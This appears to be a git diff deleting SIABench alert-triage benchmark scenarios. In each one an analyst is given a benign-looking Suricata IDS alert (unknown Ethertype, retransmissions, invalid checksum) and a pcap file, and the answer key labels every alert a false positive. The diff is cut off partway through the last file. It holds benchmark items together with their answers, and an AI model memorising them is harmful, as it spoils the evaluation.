+++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235492", - "alert_type": "False", - "alert_name": "dp_235492" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:43:35.327264+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T03:43:35.327264+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json deleted file mode 100644 index 9de2dcbee9efc7fcad6e2ef45cec92fd38a9980d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235502.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235502", - "alert_type": "False", - "alert_name": "dp_235502" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T04:14:59.548769+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T04:14:59.548769+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json deleted file mode 100644 index c7f3f96394bf74d6a216eb34b197f881de933d84..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235537.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235537", - "alert_type": "False", - "alert_name": "dp_235537" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:45:09.696540+0000 \"SURICATA STREAM Packet with invalid timestamp\" {TCP} 192.168.1.70:40050 -> 192.168.1.3:64738", - "alert": "1970-01-01T03:45:09.696540+0000 \"SURICATA STREAM Packet with invalid timestamp\" {TCP} 192.168.1.70:40050 -> 192.168.1.3:64738", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json deleted file mode 100644 index bea8ee0f45af1eef52a230211898c35c6c739c86..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235538.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235538", - "alert_type": "False", - "alert_name": "dp_235538" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:45:09.696901+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.3:64738 -> 192.168.1.70:40050", - "alert": "1970-01-01T03:45:09.696901+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.3:64738 -> 192.168.1.70:40050", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json deleted file mode 100644 index 966bd0aa6093b4fc6683b7170f7554be0ec57cfd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235767.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235767", - "alert_type": "False", - "alert_name": "dp_235767" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T03:32:11.100215+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "alert": "1970-01-01T03:32:11.100215+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json deleted file mode 100644 index 8e27619bfeb91a0baf182f22f06c55a79d7529d6..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_235996.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_235996", - "alert_type": "False", - "alert_name": "dp_235996" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:42:27.776303+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:35900 -> 192.168.1.70:8080", - "alert": "1970-01-01T00:42:27.776303+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:35900 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json deleted file mode 100644 index 31d5e86b416d78a6cd650cbb3ca6a350181de247..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236008.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236008", - "alert_type": "False", - "alert_name": "dp_236008" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:52:42.044159+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:46582", - "alert": "1970-01-01T00:52:42.044159+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:46582", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json deleted file mode 100644 index ccd67f308b7f25053248d325df49a36257165712..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236015.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236015", - "alert_type": "False", - "alert_name": "dp_236015" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:54:20.534904+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "alert": "1970-01-01T00:54:20.534904+0000 \"SURICATA UDPv6 invalid checksum\" {UDP} fe80:0000:0000:0000:0201:01ff:fe4f:78d3:5353 -> ff02:0000:0000:0000:0000:0000:0000:00fb:5353", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json deleted file mode 100644 index d64b07c43eb109376821d983e60062d0bf9183cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236042.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236042", - "alert_type": "False", - "alert_name": "dp_236042" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T00:43:32.740109+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:59052", - "alert": "1970-01-01T00:43:32.740109+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.70:8080 -> 192.168.1.90:59052", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json deleted file mode 100644 index 0151f7cefd14aaba363c8134a83d44225e654d4a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236110.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236110", - "alert_type": "False", - "alert_name": "dp_236110" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:02.895251+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:36884 -> 192.168.1.70:8080", - "alert": "1970-01-01T05:51:02.895251+0000 \"SURICATA STREAM excessive retransmissions\" {TCP} 192.168.1.90:36884 -> 192.168.1.70:8080", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json deleted file mode 100644 index 94b8a1e1e6d08d69655d8a15a18f27d64902c4f4..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236114.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236114", - "alert_type": "False", - "alert_name": "dp_236114" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:38.642031+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:51:38.642031+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json deleted file mode 100644 index eb924181ea95c02d53f04fdf27739873ccdf258c..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236115.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236115", - "alert_type": "False", - "alert_name": "dp_236115" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:51:38.645198+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:51:38.645198+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json deleted file mode 100644 index 37061f3e15167176d93e6e46902b426b9349df32..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236116.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236116", - "alert_type": "False", - "alert_name": "dp_236116" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:16.348545+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:16.348545+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json deleted file mode 100644 index cf7dea19d83f22ddae6398d9b2e3b74d2fd967e8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236117.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236117", - "alert_type": "False", - "alert_name": "dp_236117" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:36.700833+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:36.700833+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json deleted file mode 100644 index 9cba8ff624a8ce93972aea21bc763694d2a271b3..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236118.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236118", - "alert_type": "False", - "alert_name": "dp_236118" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:36.704244+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:36.704244+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json deleted file mode 100644 index 064ebf327c19859c79bf1cefe65cc14345cf1884..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236119.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236119", - "alert_type": "False", - "alert_name": "dp_236119" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:40.079882+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:40.079882+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json deleted file mode 100644 index 16d8b4e4002f8e64d4876e06c9e2b3ce131480f8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236120.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236120", - "alert_type": "False", - "alert_name": "dp_236120" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:52:40.085525+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:52:40.085525+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json deleted file mode 100644 index 91e0729b4fe90901759299e9e77f2f27194252cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236121.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236121", - "alert_type": "False", - "alert_name": "dp_236121" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:17.788844+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:17.788844+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json deleted file mode 100644 index f2cb0cac01a2c46f0be0e2a2363e7a534f7aa2b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236122.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236122", - "alert_type": "False", - "alert_name": "dp_236122" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:38.139937+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:38.139937+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json deleted file mode 100644 index 57bf625c7f7a85b1a9ffa91f572631e63d9b992b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/FP/scenario_dp_236123.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_236123", - "alert_type": "False", - "alert_name": "dp_236123" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:53:38.144878+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "alert": "1970-01-01T05:53:38.144878+0000 \"SURICATA Ethertype unknown\" {None} None:None -> None:None", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": 